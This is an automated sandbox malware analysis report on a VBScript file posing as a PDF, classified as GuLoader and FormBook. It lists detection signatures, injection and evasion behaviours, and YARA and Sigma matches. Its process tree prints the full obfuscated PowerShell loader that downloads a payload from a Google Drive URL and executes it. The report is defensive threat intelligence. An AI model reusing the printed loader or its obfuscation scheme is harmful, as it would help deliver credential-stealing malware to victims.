Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
U00b7pdf.vbs

Overview

General Information

Sample name:U00b7pdf.vbs
renamed because original name is a hash value
Original sample name: (GTU) 03-10-2025pdf.vbs
Analysis ID:1634248
MD5:74d92a6c289ac8dbbecbecc1a5e33d86
SHA1:d959abc835f343ce2589b2d7ce7e17eae93e0d91
SHA256:a8f881d448bc581c96f6f325e5a0b6c6e1e64101fc6462c8228f56dfd837e389
Tags:vbsuser-abuse_ch
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7284 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 7340 cmdline: ping Host_6637.6637.6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7436 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Unutterability;function Bldagtigeres($Gravic){ .($Semidocumentary) ($Gravic)} function Sinterens($Efemerisk){$Jordspekulationens=4;do{$Velhavers+=$Efemerisk[$Jordspekulationens];$Jordspekulationens+=5;$Relatch=Format-List} until(!$Efemerisk[$Jordspekulationens])$Velhavers}$Feltundersgelses=Sinterens 'D fenTvise .hlT V r. Minw';$Feltundersgelses+=Sinterens 'Ca,sEUnpeBKontcIndeL,iquI ProEBibuNEnact';$forlngerledningen=Sinterens 'SproMabeloNicyz MotiVelol DaclClavaKbyt/';$Eelware=Sinterens 'EjedTStoplEtissMes,1a,di2';$Caplock='Unde[ achntilsESpalTTeak.BrinS PomeU skRManuV S miBo lCPr seEda P b iOSu eIPotaNUdsttclosm TabABe aNForfaRe dgXrayEfootRT.ss]Kata: Cac:Ac.psAan E FicCH lpuIngeRMichIPredTDetryGalaPAtler SproFindTLumbOBaancT.neOAfsplPelm= hel$MetaEHonoE O hlExubwSmaaAaffor,fveE';$forlngerledningen+=Sinterens ' ryo5Pyth. gri0 Ban ul(QuinWCosmiRig nR add.denoDaysw .ocsRead PeroNBroaTAm.n Sem1Ande0Stee.Parm0 Ont; orm KrusWF ntib evn ont6Nupp4Harv;Over HealxDumb6Fed 4outs;rein S,perIniqvBeca:Port1Solo3arri4Brak.Unpe0 F r)Unsm SvanG.llieZooicRep ke plo Pl./Secu2Kata0Audi1Bedd0Dend0 aab1Unus0Min.1Over GrilFhu tiUnderUsureoutefViceostadx.etr/Preo1 Bde3Estl4regn.In d0';$Paabegyndelsers=Sinterens 'Ce tUFabuSTeolE ameRSmaa-RetoAcompg DyseGylln ArkT';$Fibromyxosarcoma=Sinterens 'Tuneh Bl,t P ctCincpChansk nt: Bek/Unco/ UnidEmu.r MatiberavDisue ,fk. SucgDislo TogoPalig MaalBr.wejo,d.WroucFrivoUnjemVedt/Bogsu MelcUdmu?UforeSpejx rsep e,eoluger.strt ivs=BenedPar,oChe w NonnGladlM,sioSp oaUniddBorr&H xai ntedUnmi=Tsum1 ps GIr d7 SweZSa.lLNonqO RanAH bk9 UdbQA coZ NeuG F r5F,si-SandnAcrav Gr AAmebw Haltblaa0 dsabS alW eprXFerl8 B,fi IcoeMaalrGipsl,sop9,linM TimRvan,hTamigTantq';$Stenografere=Sinterens 'Gyn >';$Semidocumentary=Sinterens 'SmreI ConEElskX';$Hypermetamorphotic='Drklokke';$dirigentklokkernes='\Beflingens.Com';Bldagtigeres (Sinterens 'Drif$St mGModpLUntho.ismB StoAPjasLSub :Be eASuprf UndKCru rSla f,rmltUnareRockREmne= gte$Te,eeEmptnjuleV Co :Cat a .plp D,rPSa nD IntA rteTRuffAF nn+Hj d$I dfDFreiIT,otRUnsuI MongArvee mpln AretVe sk onLPugiObipekCarbkha,ve redRCalons ntEUdarS');Bldagtigeres (Sinterens ' Ist$r,paGExchlveneOButcbHe tA HysLHamm:VeteuJordDD safInaulsynge ndutKo tnerg.IBlovnEle.GPublEB.kkrStvlNT,ktESto =Big.$BookfRetsiFluoB InsR PleOFeltMforsY N,nx FacO VmsS Erha.ecirCompCFleto RanmMan a fo .Bit,sOverPMicrLCam.IUngdTDat (Non.$Gld SAlabT CumeInteN AftOEmfagDrejrh.emaChirF Gr Et.ttRT.acESy,u)');Bldagtigeres (Sinterens $Caplock);$Fibromyxosarcoma=$Udfletningerne[0];$Kumiss=(Sinterens ' ice$MbleGUdspLO enONon,B BriASerpLp ym: rbeK VagNCol,UB.ceS YelE sidL S rsHabikUnf eAnisn EmidGasdESvrvsBygn= Ba nbdleE S nWChei- B oO MolbN.alJLumbEUnr.CPapdtUmed F stsSpicyE ots,rget Tr EPalem Spl.Bic.$Cen fEnvieGrosl HaltSkudUTracnStegDUtt,eUnalRPseusSubrg TyneNe rl MaaSHalvEGanos');Bldagtigeres ($Kumiss);Bldagtigeres (Sinterens 'Togg$stemKLangn R nuSll.sparae,artlPocksUr.kkIodoedundn SysdSamteParasA,um.Tre HNgomePelvaFjlldJolle ,trr rys F r[Trum$PillPm.ssaChipaContbHoloe xcog hadyju andykkd RepeTryglUnvis FlueSpatrRappsAnis]Bedr= E t$Dopifsh eoUnberGravlTylvnBevogOvereRe nr kllF rle Defd nfenCl piFremnScapgPre,e Supn');$Aggrades107=Sinterens 'Subc$.ortKIraknId.auBeras voe ootl UunsAdvokSkyde SypnD nidIsole BrosSino.FlerD PeaoMeg wUdgrnRaaklKon o cooa Cagd.porF AnaiScholBathe See(Flet$Fld F Beai Paeb VilrstapoEp tmRepry ocx agoSubpsFi.aaUnderRadicinteoParlmGrueaSil,, ans$Popuo RatpR prsstame .nkn arpdpr.ceoper)';$opsende=$Afkrfter;Bldagtigeres (Sinterens 'U lo$ orsgPropl.apno ParbFlowa K sLNonf:FootoHvniLUnstIFra g ncooH,anS ErhACla c unc KonhOktaa,aciR .nfisemiD .anE erpsGrun=Coll(Bl kTKa tEPaa.S DoutSla -Basip eoa BamTsejlH onp Toph$Spelovarip.onrsAdrtEVindNArtoDSlurePitt)');while (!$Oligosaccharides) {Bldagtigeres (Sinterens 'Rull$EkspgPla lF ldoG ifb St aDeltl ,il: WayS nauF erbG upsChimt Spea.nehnRenotUd oiOmniaCholbCo ylOve eSabb=Pl t$InsaSErytyKon nEl ktGemmaAchrk.ormsChema Vaan allaRebol,nreyEnnesUncoeValgr,oodeBeslr') ;Bldagtigeres $Aggrades107;Bldagtigeres (Sinterens 'P pe[RadiTViskHReciRMe.nE inaAUndedStapIBoksnButyg Sko.,astT SepH VanRGenteGtesASn pDAger] Un,:Mere: P.rSUnisLFormePeriES.isPBegi(Omgr4Zoog0 Red0Fire0Hvir)');Bldagtigeres (Sinterens 'brne$LysgGPe ll MenO.eglbSvinAInv,l Her:UmagoMen l DriIFjerG Brao TenSSar,A HerCSladCb azHFir.aE enR Teai,uffDPaneesrafsPaah=brid( Gr,TStikeN tas entt Mis-ModfPMaddATriftv,gthover Ufor$BlddO Fo,P HeaSmusheDadaNDetadLaseEOd n)') ;Bldagtigeres (Sinterens 'Regu$ G.eGFejllG seO F ibDefoAPr.nlSpon:DevatPolyaPhlegPer,u CerNUndedFodbe ,ndr IcesR,meTPseur LegY UbegTry,nCantIgustn MarGF od=Varm$ MisgArvelneuro.ootb odeaMediL Byc:Wel.U ,utRProtE MandhundEM skLHugoiAparGBrodHNatueGutwdMounECat.R R.b+Tr.k+Pl a%Lave$Opv U RygDUndefFu.gLAv.ceCruiTStubnVeksiKaldnElecgB.sweAutoRsam n hacEHoro.DetecUnegoF ofu Ch NAnict') ;$Fibromyxosarcoma=$Udfletningerne[$Tagunderstrygning]}$Schoolboyhood=362868;$Videresalget=30413;Bldagtigeres (Sinterens 'Pent$RetsG MillSnoooS ntbFlkkaSpytLDec,:.edlu s vfkugerInteiSaavV f aI rrlB azL ohni KorgScu eNona Over=Inte .npoGPetaeNangtBack- HalCDisio verNByggtU faetrann ejtPoly Nigr$.onoOPostP.olisHoveELibrnhypsdVal,e');Bldagtigeres (Sinterens 'Blre$ Hy,g ,unlGingoPh,lb Ra,a Bryl,lut:BesmCtetrhUd riMerckPostePundeDive Text=Me.n Wels[ yseS Squy Syms vertCy.leTr.lm Red.Fa uC DikoNon n UtevScroeK,slrByortPara]Utop:Draa:S loFGuilrSpl,oKonsm Ba,BBra,a Ch s,ulieIm l6Klag4UdlbS Ampt S yr amiOp,inTryggAto (Mose$LiniUEksefSpunrForei SkrvNon iJo klForul ordi langSky eKvat)');Bldagtigeres (Sinterens 'Liq $AktigAfhoLCynoo M,lbFortANe klOver: U psLoweCPurbhbaciIForeL AdvLU,rae orrR KomfabsoeBldelEntrSFara1embo6Quie9Syst Hyg=Dec Du.t[ PrisReciYLibeSNonsTSaltEZoolM fs.fo stInsteOpdaXPre TSoci. D yESkimN DowcTre O onDModuiEmann Hjeg Und] Pru:Ultr:EtolaSoj STranCTofuIcouniPro,.ShaugSupeEHausTNu sSVaniTUnshrBlu,IChorNU poG egi( nke$ RefCFineH ProiO teKkltreMo.oeLang)');Bldagtigeres (Sinterens 'Hjer$ SkugPendlVicao T ubEldiAS halBigo:Me aAExo,GUdskRFor oBergbAut A S rCSleetRaciE.tepRSkrhISquauUn.omKa e=Sarc$ov rST.skc Fo HSonsiFi aLak llMusteSterRUnpofappeeForsLFridsMi h1v,ld6Leni9C ld.ForrSSubpuUpgrbwaggs p etVe orHis II.stNVagtGCl,i(Lyd $BumpsRiftcSkufhS,rmoSnowOSt ml Ro BDiskOIndiym.lih RenOS.raOClicdEstr,Unfe$Overv SulIComadSkrdESgetRSydfeLnnesFrerAVexil JurGSt mE EneTGly )');Bldagtigeres $agrobacterium;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7548 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • powershell.exe (PID: 4344 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Unutterability;function Bldagtigeres($Gravic){ .($Semidocumentary) ($Gravic)} function Sinterens($Efemerisk){$Jordspekulationens=4;do{$Velhavers+=$Efemerisk[$Jordspekulationens];$Jordspekulationens+=5;$Relatch=Format-List} until(!$Efemerisk[$Jordspekulationens])$Velhavers}$Feltundersgelses=Sinterens 'D fenTvise .hlT V r. Minw';$Feltundersgelses+=Sinterens 'Ca,sEUnpeBKontcIndeL,iquI ProEBibuNEnact';$forlngerledningen=Sinterens 'SproMabeloNicyz MotiVelol DaclClavaKbyt/';$Eelware=Sinterens 'EjedTStoplEtissMes,1a,di2';$Caplock='Unde[ achntilsESpalTTeak.BrinS PomeU skRManuV S miBo lCPr seEda P b iOSu eIPotaNUdsttclosm TabABe aNForfaRe dgXrayEfootRT.ss]Kata: Cac:Ac.psAan E FicCH lpuIngeRMichIPredTDetryGalaPAtler SproFindTLumbOBaancT.neOAfsplPelm= hel$MetaEHonoE O hlExubwSmaaAaffor,fveE';$forlngerledningen+=Sinterens ' ryo5Pyth. gri0 Ban ul(QuinWCosmiRig nR add.denoDaysw .ocsRead PeroNBroaTAm.n Sem1Ande0Stee.Parm0 Ont; orm KrusWF ntib evn ont6Nupp4Harv;Over HealxDumb6Fed 4outs;rein S,perIniqvBeca:Port1Solo3arri4Brak.Unpe0 F r)Unsm SvanG.llieZooicRep ke plo Pl./Secu2Kata0Audi1Bedd0Dend0 aab1Unus0Min.1Over GrilFhu tiUnderUsureoutefViceostadx.etr/Preo1 Bde3Estl4regn.In d0';$Paabegyndelsers=Sinterens 'Ce tUFabuSTeolE ameRSmaa-RetoAcompg DyseGylln ArkT';$Fibromyxosarcoma=Sinterens 'Tuneh Bl,t P ctCincpChansk nt: Bek/Unco/ UnidEmu.r MatiberavDisue ,fk. SucgDislo TogoPalig MaalBr.wejo,d.WroucFrivoUnjemVedt/Bogsu MelcUdmu?UforeSpejx rsep e,eoluger.strt ivs=BenedPar,oChe w NonnGladlM,sioSp oaUniddBorr&H xai ntedUnmi=Tsum1 ps GIr d7 SweZSa.lLNonqO RanAH bk9 UdbQA coZ NeuG F r5F,si-SandnAcrav Gr AAmebw Haltblaa0 dsabS alW eprXFerl8 B,fi IcoeMaalrGipsl,sop9,linM TimRvan,hTamigTantq';$Stenografere=Sinterens 'Gyn >';$Semidocumentary=Sinterens 'SmreI ConEElskX';$Hypermetamorphotic='Drklokke';$dirigentklokkernes='\Beflingens.Com';Bldagtigeres (Sinterens 'Drif$St mGModpLUntho.ismB StoAPjasLSub :Be eASuprf UndKCru rSla f,rmltUnareRockREmne= gte$Te,eeEmptnjuleV Co :Cat a .plp D,rPSa nD IntA rteTRuffAF nn+Hj d$I dfDFreiIT,otRUnsuI MongArvee mpln AretVe sk onLPugiObipekCarbkha,ve redRCalons ntEUdarS');Bldagtigeres (Sinterens ' Ist$r,paGExchlveneOButcbHe tA HysLHamm:VeteuJordDD safInaulsynge ndutKo tnerg.IBlovnEle.GPublEB.kkrStvlNT,ktESto =Big.$BookfRetsiFluoB InsR PleOFeltMforsY N,nx FacO VmsS Erha.ecirCompCFleto RanmMan a fo .Bit,sOverPMicrLCam.IUngdTDat (Non.$Gld SAlabT CumeInteN AftOEmfagDrejrh.emaChirF Gr Et.ttRT.acESy,u)');Bldagtigeres (Sinterens $Caplock);$Fibromyxosarcoma=$Udfletningerne[0];$Kumiss=(Sinterens ' ice$MbleGUdspLO enONon,B BriASerpLp ym: rbeK VagNCol,UB.ceS YelE sidL S rsHabikUnf eAnisn EmidGasdESvrvsBygn= Ba nbdleE S nWChei- B oO MolbN.alJLumbEUnr.CPapdtUmed F stsSpicyE ots,rget Tr EPalem Spl.Bic.$Cen fEnvieGrosl HaltSkudUTracnStegDUtt,eUnalRPseusSubrg TyneNe rl MaaSHalvEGanos');Bldagtigeres ($Kumiss);Bldagtigeres (Sinterens 'Togg$stemKLangn R nuSll.sparae,artlPocksUr.kkIodoedundn SysdSamteParasA,um.Tre HNgomePelvaFjlldJolle ,trr rys F r[Trum$PillPm.ssaChipaContbHoloe xcog hadyju andykkd RepeTryglUnvis FlueSpatrRappsAnis]Bedr= E t$Dopifsh eoUnberGravlTylvnBevogOvereRe nr kllF rle Defd nfenCl piFremnScapgPre,e Supn');$Aggrades107=Sinterens 'Subc$.ortKIraknId.auBeras voe ootl UunsAdvokSkyde SypnD nidIsole BrosSino.FlerD PeaoMeg wUdgrnRaaklKon o cooa Cagd.porF AnaiScholBathe See(Flet$Fld F Beai Paeb VilrstapoEp tmRepry ocx agoSubpsFi.aaUnderRadicinteoParlmGrueaSil,, ans$Popuo RatpR prsstame .nkn arpdpr.ceoper)';$opsende=$Afkrfter;Bldagtigeres (Sinterens 'U lo$ orsgPropl.apno ParbFlowa K sLNonf:FootoHvniLUnstIFra g ncooH,anS ErhACla c unc KonhOktaa,aciR .nfisemiD .anE erpsGrun=Coll(Bl kTKa tEPaa.S DoutSla -Basip eoa BamTsejlH onp Toph$Spelovarip.onrsAdrtEVindNArtoDSlurePitt)');while (!$Oligosaccharides) {Bldagtigeres (Sinterens 'Rull$EkspgPla lF ldoG ifb St aDeltl ,il: WayS nauF erbG upsChimt Spea.nehnRenotUd oiOmniaCholbCo ylOve eSabb=Pl t$InsaSErytyKon nEl ktGemmaAchrk.ormsChema Vaan allaRebol,nreyEnnesUncoeValgr,oodeBeslr') ;Bldagtigeres $Aggrades107;Bldagtigeres (Sinterens 'P pe[RadiTViskHReciRMe.nE inaAUndedStapIBoksnButyg Sko.,astT SepH VanRGenteGtesASn pDAger] Un,:Mere: P.rSUnisLFormePeriES.isPBegi(Omgr4Zoog0 Red0Fire0Hvir)');Bldagtigeres (Sinterens 'brne$LysgGPe ll MenO.eglbSvinAInv,l Her:UmagoMen l DriIFjerG Brao TenSSar,A HerCSladCb azHFir.aE enR Teai,uffDPaneesrafsPaah=brid( Gr,TStikeN tas entt Mis-ModfPMaddATriftv,gthover Ufor$BlddO Fo,P HeaSmusheDadaNDetadLaseEOd n)') ;Bldagtigeres (Sinterens 'Regu$ G.eGFejllG seO F ibDefoAPr.nlSpon:DevatPolyaPhlegPer,u CerNUndedFodbe ,ndr IcesR,meTPseur LegY UbegTry,nCantIgustn MarGF od=Varm$ MisgArvelneuro.ootb odeaMediL Byc:Wel.U ,utRProtE MandhundEM skLHugoiAparGBrodHNatueGutwdMounECat.R R.b+Tr.k+Pl a%Lave$Opv U RygDUndefFu.gLAv.ceCruiTStubnVeksiKaldnElecgB.sweAutoRsam n hacEHoro.DetecUnegoF ofu Ch NAnict') ;$Fibromyxosarcoma=$Udfletningerne[$Tagunderstrygning]}$Schoolboyhood=362868;$Videresalget=30413;Bldagtigeres (Sinterens 'Pent$RetsG MillSnoooS ntbFlkkaSpytLDec,:.edlu s vfkugerInteiSaavV f aI rrlB azL ohni KorgScu eNona Over=Inte .npoGPetaeNangtBack- HalCDisio verNByggtU faetrann ejtPoly Nigr$.onoOPostP.olisHoveELibrnhypsdVal,e');Bldagtigeres (Sinterens 'Blre$ Hy,g ,unlGingoPh,lb Ra,a Bryl,lut:BesmCtetrhUd riMerckPostePundeDive Text=Me.n Wels[ yseS Squy Syms vertCy.leTr.lm Red.Fa uC DikoNon n UtevScroeK,slrByortPara]Utop:Draa:S loFGuilrSpl,oKonsm Ba,BBra,a Ch s,ulieIm l6Klag4UdlbS Ampt S yr amiOp,inTryggAto (Mose$LiniUEksefSpunrForei SkrvNon iJo klForul ordi langSky eKvat)');Bldagtigeres (Sinterens 'Liq $AktigAfhoLCynoo M,lbFortANe klOver: U psLoweCPurbhbaciIForeL AdvLU,rae orrR KomfabsoeBldelEntrSFara1embo6Quie9Syst Hyg=Dec Du.t[ PrisReciYLibeSNonsTSaltEZoolM fs.fo stInsteOpdaXPre TSoci. D yESkimN DowcTre O onDModuiEmann Hjeg Und] Pru:Ultr:EtolaSoj STranCTofuIcouniPro,.ShaugSupeEHausTNu sSVaniTUnshrBlu,IChorNU poG egi( nke$ RefCFineH ProiO teKkltreMo.oeLang)');Bldagtigeres (Sinterens 'Hjer$ SkugPendlVicao T ubEldiAS halBigo:Me aAExo,GUdskRFor oBergbAut A S rCSleetRaciE.tepRSkrhISquauUn.omKa e=Sarc$ov rST.skc Fo HSonsiFi aLak llMusteSterRUnpofappeeForsLFridsMi h1v,ld6Leni9C ld.ForrSSubpuUpgrbwaggs p etVe orHis II.stNVagtGCl,i(Lyd $BumpsRiftcSkufhS,rmoSnowOSt ml Ro BDiskOIndiym.lih RenOS.raOClicdEstr,Unfe$Overv SulIComadSkrdESgetRSydfeLnnesFrerAVexil JurGSt mE EneTGly )');Bldagtigeres $agrobacterium;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 3904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7652 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6860 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6476 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6716 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7672 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 4744 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7700 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 3696 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 1384 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 1372 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 1212 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • dxdiag.exe (PID: 7812 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • FUrHThL4lQ4AVjnAsevEg.exe (PID: 6164 cmdline: "C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\BgMzrZbBIYKvT.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • poqexec.exe (PID: 1732 cmdline: "C:\Windows\SysWOW64\poqexec.exe" MD5: 3D570C0E68734A7B81BE47313E442974)
        • findstr.exe (PID: 8160 cmdline: "C:\Windows\SysWOW64\findstr.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • FUrHThL4lQ4AVjnAsevEg.exe (PID: 6412 cmdline: "C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\Wp7UmUFPkjWuav.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 336 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001E.00000002.2467721124.0000000000D20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000001E.00000002.2463661384.0000000000850000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000001E.00000002.2467865080.0000000000D70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000001C.00000002.2467491077.00000000051E0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000C.00000002.1845297840.0000000008C60000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 11 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7436.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_7436.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xfe3b:$b2: ::FromBase64String(
              • 0xd183:$s1: -join
              • 0x692f:$s4: +=
              • 0x69f1:$s4: +=
              • 0xac18:$s4: +=
              • 0xcd35:$s4: +=
              • 0xd01f:$s4: +=
              • 0xd165:$s4: +=
              • 0xf52f:$s4: +=
              • 0xf5af:$s4: +=
              • 0xf675:$s4: +=
              • 0xf6f5:$s4: +=
              • 0xf8cb:$s4: +=
              • 0xf94f:$s4: +=
              • 0xd9b5:$e4: Get-WmiObject
              • 0xdba4:$e4: Get-Process
              • 0xdbfc:$e4: Start-Process
              amsi32_4344.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xa9a1:$b2: ::FromBase64String(
              • 0x9a1b:$s1: -join
              • 0x31c7:$s4: +=
              • 0x3289:$s4: +=
              • 0x74b0:$s4: +=
              • 0x95cd:$s4: +=
              • 0x98b7:$s4: +=
              • 0x99fd:$s4: +=
              • 0x13a56:$s4: +=
              • 0x13ad6:$s4: +=
              • 0x13b9c:$s4: +=
              • 0x13c1c:$s4: +=
              • 0x13df2:$s4: +=
              • 0x13e76:$s4: +=
              • 0xa24d:$e4: Get-WmiObject
              • 0xa43c:$e4: Get-Process
              • 0xa494:$e4: Start-Process
              • 0x14719:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs", ProcessId: 7284, ProcessName: wscript.exe
              Sigma detected: Potential Binary Or Script Dropper Via PowerShell
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7436, TargetFilename: C:\Users\user\AppData\Roaming\Beflingens.Com
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs", ProcessId: 7284, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
